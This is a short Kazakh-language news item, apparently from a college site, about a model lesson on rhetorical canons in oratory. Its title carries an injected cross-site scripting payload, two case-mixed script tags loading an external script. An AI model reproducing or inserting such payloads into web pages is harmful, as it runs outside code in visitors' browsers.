Шешендік сөздегі риторикалық канондар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.04.2019

    12 сәуір күні Аймаханова Бибіжамал Төреханқызының қазақ тілі пәнінен «Шешендік сөздегі риторикалық канондар» атты тақырыпта үлгі сабақ берді. Үлгі сабақ филология бөлімінің меңгерушісі Қ.Иманбаев, тіл және әдебиет кафедрасының оқытушыларының қатысуымен өтті. Сабақтың мақсаты: білім алушылардың шығармашылық ойлау қабілеттерін дамыту, тіл байлығын жетілдіру. Сөз құдіретін ұғына отырып, өмір қажеттілігіне жарату. Сабақ барысында кубизм стратегиясы, джиксо әдістерін студенттермен бірге пайдалану арқылы жүзеге асты. Шаттық шеңбері  «Қанатты сөздер» арқылы бір-біріне тілек айтады. «Төле би», «Қазбек би», «Әйтеке би»ауылы болып үш топқа бөлініп,  әр топқа бағалау критерийлері жазылған парақша таратылады. Сабақ тиімді, әрі қызықты өткізілді. Студенттер сабаққа жүйелі дайындықпен келгендерін дәлелдей алды.

 

 

Просмотров: 876


Пікір қосу



Деректерді қолтаңбаға қосу